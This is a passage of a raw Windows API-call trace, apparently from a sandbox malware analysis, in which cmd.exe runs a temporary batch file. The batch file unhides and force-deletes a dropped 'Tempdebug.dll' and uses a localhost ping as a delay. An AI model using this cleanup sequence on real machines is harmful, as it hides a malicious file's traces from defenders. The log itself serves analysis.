_wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0051.115] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0051.115] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0051.115] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0051.115] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0051.115] _wcsnicmp (_String1="COPYCMD", _String2="PSExecu", _MaxCount=0x7) returned -13 [0051.115] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0051.115] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0051.115] _wcsnicmp (_String1="COPYCMD", _String2="SESSION", _MaxCount=0x7) returned -16 [0051.115] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0051.115] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0051.115] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0051.115] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0051.115] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0051.115] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0051.115] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0051.115] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0051.115] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0051.116] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="ATTRIB -h -s \"C:\\Users\\BGC6U8~1\\AppData\\Local\\Tempdebug.dll\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\BGC6u8Oy yXGxkR\\Desktop", lpStartupInfo=0x24ed64*(cb=0x48, lpReserved=0x0, lpDesktop="Winsta0\\Default", lpTitle="ATTRIB -h -s \"C:\\Users\\BGC6U8~1\\AppData\\Local\\Tempdebug.dll\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x24edb0 | out: lpCommandLine="ATTRIB -h -s \"C:\\Users\\BGC6U8~1\\AppData\\Local\\Tempdebug.dll\"", lpProcessInformation=0x24edb0*(hProcess=0x54, hThread=0x58, dwProcessId=0xce0, dwThreadId=0xce4)) returned 1 [0051.146] CloseHandle (hObject=0x58) returned 1 [0051.146] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0051.146] GetEnvironmentStringsW () returned 0x421ee8* [0051.146] FreeEnvironmentStringsW (penv=0x421ee8) returned 1 [0051.146] WaitForSingleObject (hHandle=0x54, dwMilliseconds=0xffffffff) returned 0x0 [0051.239] GetExitCodeProcess (in: hProcess=0x54, lpExitCode=0x24eca4 | out: lpExitCode=0x24eca4*=0x0) returned 1 [0051.239] CloseHandle (hObject=0x54) returned 1 [0051.239] _vsnwprintf (in: _Buffer=0x24edec, _BufferCount=0x13, _Format="%08X", _ArgList=0x24ecb0 | out: _Buffer="00000000") returned 8 [0051.239] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0051.239] GetEnvironmentStringsW () returned 0x423e88* [0051.239] FreeEnvironmentStringsW (penv=0x423e88) returned 1 [0051.239] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0051.239] GetEnvironmentStringsW () returned 0x423e88* [0051.239] FreeEnvironmentStringsW (penv=0x423e88) returned 1 [0051.239] DeleteProcThreadAttributeList (in: lpAttributeList=0x24ed08 | out: lpAttributeList=0x24ed08) [0051.239] _get_osfhandle (_FileHandle=1) returned 0x7 [0051.239] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0051.240] _get_osfhandle (_FileHandle=1) returned 0x7 [0051.240] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49e741ac | out: lpMode=0x49e741ac) returned 1 [0051.240] _get_osfhandle (_FileHandle=0) returned 0x3 [0051.240] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49e741b0 | out: lpMode=0x49e741b0) returned 1 [0051.240] SetConsoleInputExeNameW () returned 0x1 [0051.240] GetConsoleOutputCP () returned 0x1b5 [0051.240] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49e74260 | out: lpCPInfo=0x49e74260) returned 1 [0051.240] SetThreadUILanguage (LangId=0x0) returned 0x409 [0051.240] CreateFileW (lpFileName="C:\\Users\\BGC6U8~1\\AppData\\Local\\Temp\\iun4816.bat" (normalized: "c:\\users\\bgc6u8~1\\appdata\\local\\temp\\iun4816.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x24f524, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x54 [0051.240] _open_osfhandle (_OSFileHandle=0x54, _Flags=8) returned 3 [0051.240] _get_osfhandle (_FileHandle=3) returned 0x54 [0051.240] SetFilePointer (in: hFile=0x54, lDistanceToMove=71, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x47 [0051.241] _get_osfhandle (_FileHandle=3) returned 0x54 [0051.241] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x47 [0051.241] ReadFile (in: hFile=0x54, lpBuffer=0x49e76640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x24f508, lpOverlapped=0x0 | out: lpBuffer=0x49e76640*, lpNumberOfBytesRead=0x24f508*=0xae, lpOverlapped=0x0) returned 1 [0051.241] SetFilePointer (in: hFile=0x54, lDistanceToMove=127, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x7f [0051.241] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x49e76640, cbMultiByte=56, lpWideCharStr=0x49e7c640, cchWideChar=8191 | out: lpWideCharStr="del /f \"C:\\Users\\BGC6U8~1\\AppData\\Local\\Tempdebug.dll\"\r\ndll\"\r\n") returned 56 [0051.241] _get_osfhandle (_FileHandle=3) returned 0x54 [0051.241] GetFileType (hFile=0x54) returned 0x1 [0051.241] _get_osfhandle (_FileHandle=3) returned 0x54 [0051.241] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x7f [0051.242] _tell (_FileHandle=3) returned 127 [0051.242] _close (_FileHandle=3) returned 0 [0051.242] _vsnwprintf (in: _Buffer=0x49e84640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x24f2dc | out: _Buffer="\r\n") returned 2 [0051.242] _get_osfhandle (_FileHandle=1) returned 0x7 [0051.242] GetFileType (hFile=0x7) returned 0x2 [0051.242] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0051.242] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x24f29c | out: lpMode=0x24f29c) returned 1 [0051.242] _get_osfhandle (_FileHandle=1) returned 0x7 [0051.242] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49e84640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x24f2c8, lpReserved=0x0 | out: lpBuffer=0x49e84640*, lpNumberOfCharsWritten=0x24f2c8*=0x2) returned 1 [0051.242] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x49e80640, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0051.243] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49e75260 | out: lpBuffer="C:\\Users\\BGC6u8Oy yXGxkR\\Desktop") returned 0x20 [0051.243] _vsnwprintf (in: _Buffer=0x49e75e40, _BufferCount=0x3fe, _Format="%s", _ArgList=0x24f2d8 | out: _Buffer="C:\\Users\\BGC6u8Oy yXGxkR\\Desktop") returned 32 [0051.243] _vsnwprintf (in: _Buffer=0x49e75e80, _BufferCount=0x3de, _Format="%c", _ArgList=0x24f2d8 | out: _Buffer=">") returned 1 [0051.243] _get_osfhandle (_FileHandle=1) returned 0x7 [0051.243] GetFileType (hFile=0x7) returned 0x2 [0051.243] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0051.243] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x24f2a0 | out: lpMode=0x24f2a0) returned 1 [0051.243] _get_osfhandle (_FileHandle=1) returned 0x7 [0051.243] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49e75e40*, nNumberOfCharsToWrite=0x21, lpNumberOfCharsWritten=0x24f2cc, lpReserved=0x0 | out: lpBuffer=0x49e75e40*, lpNumberOfCharsWritten=0x24f2cc*=0x21) returned 1 [0051.243] _get_osfhandle (_FileHandle=1) returned 0x7 [0051.243] GetFileType (hFile=0x7) returned 0x2 [0051.243] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0051.243] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x24f524 | out: lpMode=0x24f524) returned 1 [0051.243] _get_osfhandle (_FileHandle=1) returned 0x7 [0051.243] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x42f368*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0x24f550, lpReserved=0x0 | out: lpBuffer=0x42f368*, lpNumberOfCharsWritten=0x24f550*=0x3) returned 1 [0051.244] _vsnwprintf (in: _Buffer=0x49e84640, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x24f55c | out: _Buffer=" /f \"C:\\Users\\BGC6U8~1\\AppData\\Local\\Tempdebug.dll\" ") returned 52 [0051.244] _get_osfhandle (_FileHandle=1) returned 0x7 [0051.244] GetFileType (hFile=0x7) returned 0x2 [0051.244] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0051.244] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x24f51c | out: lpMode=0x24f51c) returned 1 [0051.244] _get_osfhandle (_FileHandle=1) returned 0x7 [0051.244] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49e84640*, nNumberOfCharsToWrite=0x34, lpNumberOfCharsWritten=0x24f548, lpReserved=0x0 | out: lpBuffer=0x49e84640*, lpNumberOfCharsWritten=0x24f548*=0x34) returned 1 [0051.244] _vsnwprintf (in: _Buffer=0x49e84640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x24f57c | out: _Buffer="\r\n") returned 2 [0051.244] _get_osfhandle (_FileHandle=1) returned 0x7 [0051.244] GetFileType (hFile=0x7) returned 0x2 [0051.244] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0051.244] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x24f53c | out: lpMode=0x24f53c) returned 1 [0051.245] _get_osfhandle (_FileHandle=1) returned 0x7 [0051.245] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49e84640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x24f568, lpReserved=0x0 | out: lpBuffer=0x49e84640*, lpNumberOfCharsWritten=0x24f568*=0x2) returned 1 [0051.245] _wcsicmp (_String1="del", _String2="DIR") returned -4 [0051.245] _wcsicmp (_String1="del", _String2="ERASE") returned -1 [0051.245] _wcsicmp (_String1="del", _String2="DEL") returned 0 [0051.245] GetConsoleTitleW (in: lpConsoleTitle=0x24f0ec, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0051.246] GetCurrentDirectoryW (in: nBufferLength=0x106, lpBuffer=0x24eea4 | out: lpBuffer="C:\\Users\\BGC6u8Oy yXGxkR\\Desktop") returned 0x20 [0051.246] GetCurrentDirectoryW (in: nBufferLength=0x106, lpBuffer=0x24df34 | out: lpBuffer="C:\\Users\\BGC6u8Oy yXGxkR\\Desktop") returned 0x20 [0051.246] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x0, lpMaximumComponentLength=0x24e164, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x24e168, nFileSystemNameSize=0x106 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x0, lpMaximumComponentLength=0x24e164*=0xff, lpFileSystemFlags=0x0, lpFileSystemNameBuffer="NTFS") returned 1 [0051.246] _wcsicmp (_String1="NTFS", _String2="FAT") returned 8 [0051.246] _wcsicmp (_String1="Tempdebug.dll", _String2=".") returned 70 [0051.246] _wcsicmp (_String1="Tempdebug.dll", _String2="..") returned 70 [0051.246] GetFileAttributesW (lpFileName="C:\\Users\\BGC6U8~1\\AppData\\Local\\Tempdebug.dll" (normalized: "c:\\users\\bgc6u8~1\\appdata\\local\\tempdebug.dll")) returned 0x2020 [0051.246] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x431d90 | out: lpBuffer="C:\\Users\\BGC6u8Oy yXGxkR\\Desktop") returned 0x20 [0051.246] SetErrorMode (uMode=0x0) returned 0x0 [0051.246] SetErrorMode (uMode=0x1) returned 0x0 [0051.246] GetFullPathNameW (in: lpFileName="C:\\Users\\BGC6U8~1\\AppData\\Local\\Tempdebug.dll", nBufferLength=0x104, lpBuffer=0x24e588, lpFilePart=0x24e570 | out: lpBuffer="C:\\Users\\BGC6U8~1\\AppData\\Local\\Tempdebug.dll", lpFilePart=0x24e570*="Tempdebug.dll") returned 0x2d [0051.246] SetErrorMode (uMode=0x0) returned 0x1 [0051.246] GetFileAttributesW (lpFileName="C:\\Users\\BGC6U8~1\\AppData\\Local" (normalized: "c:\\users\\bgc6u8~1\\appdata\\local")) returned 0x2010 [0051.246] _wcsicmp (_String1="Tempdebug.dll", _String2=".") returned 70 [0051.246] _wcsicmp (_String1="Tempdebug.dll", _String2="..") returned 70 [0051.246] GetFileAttributesW (lpFileName="C:\\Users\\BGC6U8~1\\AppData\\Local\\Tempdebug.dll" (normalized: "c:\\users\\bgc6u8~1\\appdata\\local\\tempdebug.dll")) returned 0x2020 [0051.247] FindFirstFileExW (in: lpFileName="C:\\Users\\BGC6U8~1\\AppData\\Local\\Tempdebug.dll", fInfoLevelId=0x0, lpFindFileData=0x4107fc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x4107fc) returned 0x411000 [0051.247] DeleteFileW (lpFileName="C:\\Users\\BGC6U8~1\\AppData\\Local\\Tempdebug.dll" (normalized: "c:\\users\\bgc6u8~1\\appdata\\local\\tempdebug.dll")) returned 1 [0051.247] FindNextFileW (in: hFindFile=0x411000, lpFindFileData=0x4107fc | out: lpFindFileData=0x4107fc) returned 0 [0051.247] GetLastError () returned 0x12 [0051.248] FindClose (in: hFindFile=0x411000 | out: hFindFile=0x411000) returned 1 [0051.248] _get_osfhandle (_FileHandle=1) returned 0x7 [0051.248] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0051.248] _get_osfhandle (_FileHandle=1) returned 0x7 [0051.248] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49e741ac | out: lpMode=0x49e741ac) returned 1 [0051.248] _get_osfhandle (_FileHandle=0) returned 0x3 [0051.248] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49e741b0 | out: lpMode=0x49e741b0) returned 1 [0051.248] SetConsoleInputExeNameW () returned 0x1 [0051.248] GetConsoleOutputCP () returned 0x1b5 [0051.248] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49e74260 | out: lpCPInfo=0x49e74260) returned 1 [0051.248] SetThreadUILanguage (LangId=0x0) returned 0x409 [0051.249] CreateFileW (lpFileName="C:\\Users\\BGC6U8~1\\AppData\\Local\\Temp\\iun4816.bat" (normalized: "c:\\users\\bgc6u8~1\\appdata\\local\\temp\\iun4816.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x24f524, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x54 [0051.249] _open_osfhandle (_OSFileHandle=0x54, _Flags=8) returned 3 [0051.249] _get_osfhandle (_FileHandle=3) returned 0x54 [0051.249] SetFilePointer (in: hFile=0x54, lDistanceToMove=127, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x7f [0051.249] _get_osfhandle (_FileHandle=3) returned 0x54 [0051.249] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x7f [0051.249] ReadFile (in: hFile=0x54, lpBuffer=0x49e76640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x24f508, lpOverlapped=0x0 | out: lpBuffer=0x49e76640*, lpNumberOfBytesRead=0x24f508*=0x76, lpOverlapped=0x0) returned 1 [0051.249] SetFilePointer (in: hFile=0x54, lDistanceToMove=148, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x94 [0051.249] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x49e76640, cbMultiByte=21, lpWideCharStr=0x49e7c640, cchWideChar=8191 | out: lpWideCharStr="Ping 127.0.0.1 -n 3\r\nU8~1\\AppData\\Local\\Tempdebug.dll\"\r\ndll\"\r\n") returned 21 [0051.249] _get_osfhandle (_FileHandle=3) returned 0x54 [0051.249] GetFileType (hFile=0x54) returned 0x1 [0051.249] _get_osfhandle (_FileHandle=3) returned 0x54 [0051.249] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x94 [0051.250] _tell (_FileHandle=3) returned 148 [0051.250] _close (_FileHandle=3) returned 0 [0051.250] _vsnwprintf (in: _Buffer=0x49e84640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x24f2dc | out: _Buffer="\r\n") returned 2 [0051.250] _get_osfhandle (_FileHandle=1) returned 0x7 [0051.250] GetFileType (hFile=0x7) returned 0x2 [0051.250] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0051.250] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x24f29c | out: lpMode=0x24f29c) returned 1 [0051.250] _get_osfhandle (_FileHandle=1) returned 0x7 [0051.250] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49e84640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x24f2c8, lpReserved=0x0 | out: lpBuffer=0x49e84640*, lpNumberOfCharsWritten=0x24f2c8*=0x2) returned 1 [0051.250] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49e75260 | out: lpBuffer="C:\\Users\\BGC6u8Oy yXGxkR\\Desktop") returned 0x20 [0051.250] _vsnwprintf (in: _Buffer=0x49e75e40, _BufferCount=0x3fe, _Format="%s", _ArgList=0x24f2d8 | out: _Buffer="C:\\Users\\BGC6u8Oy yXGxkR\\Desktop") returned 32 [0051.251] _vsnwprintf (in: _Buffer=0x49e75e80, _BufferCount=0x3de, _Format="%c", _ArgList=0x24f2d8 | out: _Buffer=">") returned 1 [0051.251] _get_osfhandle (_FileHandle=1) returned 0x7 [0051.251] GetFileType (hFile=0x7) returned 0x2 [0051.251] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0051.251] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x24f2a0 | out: lpMode=0x24f2a0) returned 1 [0051.251] _get_osfhandle (_FileHandle=1) returned 0x7 [0051.251] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49e75e40*, nNumberOfCharsToWrite=0x21, lpNumberOfCharsWritten=0x24f2cc, lpReserved=0x0 | out: lpBuffer=0x49e75e40*, lpNumberOfCharsWritten=0x24f2cc*=0x21) returned 1 [0051.251] _get_osfhandle (_FileHandle=1) returned 0x7 [0051.251] GetFileType (hFile=0x7) returned 0x2 [0051.251] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0051.251] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x24f524 | out: lpMode=0x24f524) returned 1 [0051.251] _get_osfhandle (_FileHandle=1) returned 0x7 [0051.251] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4214f8*, nNumberOfCharsToWrite=0x4, lpNumberOfCharsWritten=0x24f550, lpReserved=0x0 | out: lpBuffer=0x4214f8*, lpNumberOfCharsWritten=0x24f550*=0x4) returned 1 [0051.252] _vsnwprintf (in: _Buffer=0x49e84640, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x24f55c | out: _Buffer=" 127.0.0.1 -n 3 ") returned 16 [0051.252] _get_osfhandle (_FileHandle=1) returned 0x7 [0051.252] GetFileType (hFile=0x7) returned 0x2 [0051.252] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0051.252] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x24f51c | out: lpMode=0x24f51c) returned 1 [0051.252] _get_osfhandle (_FileHandle=1) returned 0x7 [0051.252] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49e84640*, nNumberOfCharsToWrite=0x10, lpNumberOfCharsWritten=0x24f548, lpReserved=0x0 | out: lpBuffer=0x49e84640*, lpNumberOfCharsWritten=0x24f548*=0x10) returned 1 [0051.252] _vsnwprintf (in: _Buffer=0x49e84640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x24f57c | out: _Buffer="\r\n") returned 2 [0051.252] _get_osfhandle (_FileHandle=1) returned 0x7 [0051.252] GetFileType (hFile=0x7) returned 0x2 [0051.252] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0051.252] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x24f53c | out: lpMode=0x24f53c) returned 1 [0051.252] _get_osfhandle (_FileHandle=1) returned 0x7 [0051.252] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49e84640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x24f568, lpReserved=0x0 | out: lpBuffer=0x49e84640*, lpNumberOfCharsWritten=0x24f568*=0x2) returned 1 [0051.253] _wcsicmp (_String1="Ping", _String2="DIR") returned 12 [0051.253] _wcsicmp (_String1="Ping", _String2="ERASE") returned 11 [0051.253] _wcsicmp (_String1="Ping", _String2="DEL") returned 12 [0051.253] _wcsicmp (_String1="Ping", _String2="TYPE") returned -4 [0051.253] _wcsicmp (_String1="Ping", _String2="COPY") returned 13 [0051.253] _wcsicmp (_String1="Ping", _String2="CD") returned 13 [0051.253] _wcsicmp (_String1="Ping", _String2="CHDIR") returned 13 [0051.253] _wcsicmp (_String1="Ping", _String2="RENAME") returned -2 [0051.253] _wcsicmp (_String1="Ping", _String2="REN") returned -2 [0051.253] _wcsicmp (_String1="Ping", _String2="ECHO") returned 11 [0051.253] _wcsicmp (_String1="Ping", _String2="SET") returned -3 [0051.253] _wcsicmp (_String1="Ping", _String2="PAUSE") returned 8 [0051.253] _wcsicmp (_String1="Ping", _String2="DATE") returned 12 [0051.253] _wcsicmp (_String1="Ping", _String2="TIME") returned -4 [0051.253] _wcsicmp (_String1="Ping", _String2="PROMPT") returned -9 [0051.253] _wcsicmp (_String1="Ping", _String2="MD") returned 3 [0051.253] _wcsicmp (_String1="Ping", _String2="MKDIR") returned 3 [0051.253] _wcsicmp (_String1="Ping", _String2="RD") returned -2 [0051.253] _wcsicmp (_String1="Ping", _String2="RMDIR") returned -2 [0051.253] _wcsicmp (_String1="Ping", _String2="PATH") returned 8 [0051.253] _wcsicmp (_String1="Ping", _String2="GOTO") returned 9 [0051.253] _wcsicmp (_String1="Ping", _String2="SHIFT") returned -3 [0051.253] _wcsicmp (_String1="Ping", _String2="CLS") returned 13 [0051.253] _wcsicmp (_String1="Ping", _String2="CALL") returned 13 [0051.253] _wcsicmp (_String1="Ping", _String2="VERIFY") returned -6 [0051.253] _wcsicmp (_String1="Ping", _String2="VER") returned -6 [0051.253] _wcsicmp (_String1="Ping", _String2="VOL") returned -6 [0051.253] _wcsicmp (_String1="Ping", _String2="EXIT") returned 11 [0051.253] _wcsicmp (_String1="Ping", _String2="SETLOCAL") returned -3 [0051.253] _wcsicmp (_String1="Ping", _String2="ENDLOCAL") returned 11 [0051.253] _wcsicmp (_String1="Ping", _String2="TITLE") returned -4 [0051.253] _wcsicmp (_String1="Ping", _String2="START") returned -3 [0051.253] _wcsicmp (_String1="Ping", _String2="DPATH") returned 12 [0051.253] _wcsicmp (_String1="Ping", _String2="KEYS") returned 5 [0051.253] _wcsicmp (_String1="Ping", _String2="MOVE") returned 3 [0051.253] _wcsicmp (_String1="Ping", _String2="PUSHD") returned -12 [0051.253] _wcsicmp (_String1="Ping", _String2="POPD") returned -6 [0051.253] _wcsicmp (_String1="Ping", _String2="ASSOC") returned 15 [0051.253] _wcsicmp (_String1="Ping", _String2="FTYPE") returned 10 [0051.253] _wcsicmp (_String1="Ping", _String2="BREAK") returned 14 [0051.253] _wcsicmp (_String1="Ping", _String2="COLOR") returned 13 [0051.253] _wcsicmp (_String1="Ping", _String2="MKLINK") returned 3 [0051.254] SetErrorMode (uMode=0x0) returned 0x0 [0051.254] SetErrorMode (uMode=0x1) returned 0x0 [0051.254] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x431900, lpFilePart=0x24f320 | out: lpBuffer="C:\\Users\\BGC6u8Oy yXGxkR\\Desktop", lpFilePart=0x24f320*="Desktop") returned 0x20 [0051.254] SetErrorMode (uMode=0x0) returned 0x1 [0051.254] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49e80640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0051.254] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0051.254] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49e80640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0051.254] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0051.254] FindFirstFileExW (in: lpFileName="C:\\Users\\BGC6u8Oy yXGxkR\\Desktop\\Ping.*", fInfoLevelId=0x1, lpFindFileData=0x24f09c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x24f09c) returned 0xffffffff [0051.254] GetLastError () returned 0x2 [0051.254] FindFirstFileExW (in: lpFileName="C:\\Users\\BGC6u8Oy yXGxkR\\Desktop\\Ping", fInfoLevelId=0x1, lpFindFileData=0x24f09c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x24f09c) returned 0xffffffff [0051.254] GetLastError () returned 0x2 [0051.254] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0051.254] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\Ping.*", fInfoLevelId=0x1, lpFindFileData=0x24f09c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x24f09c) returned 0x431c18 [0051.255] FindClose (in: hFindFile=0x431c18 | out: hFindFile=0x431c18) returned 1 [0051.255] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\PING.COM", fInfoLevelId=0x1, lpFindFileData=0x24f09c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x24f09c) returned 0xffffffff [0051.255] GetLastError () returned 0x2 [0051.255] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\PING.EXE", fInfoLevelId=0x1, lpFindFileData=0x24f09c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x24f09c) returned 0x431c18 [0051.255] FindClose (in: hFindFile=0x431c18 | out: hFindFile=0x431c18) returned 1 [0051.255] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0051.255] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0051.255] GetConsoleTitleW (in: lpConsoleTitle=0x24f0ec, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0051.255] SetErrorMode (uMode=0x0) returned 0x0 [0051.255] SetErrorMode (uMode=0x1) returned 0x0 [0051.255] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x422b88, lpFilePart=0x24ec0c | out: lpBuffer="C:\\Users\\BGC6u8Oy yXGxkR\\Desktop", lpFilePart=0x24ec0c*="Desktop") returned 0x20 [0051.255] SetErrorMode (uMode=0x0) returned 0x1 [0051.255] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49e80640, nSize=0x2000 | out: 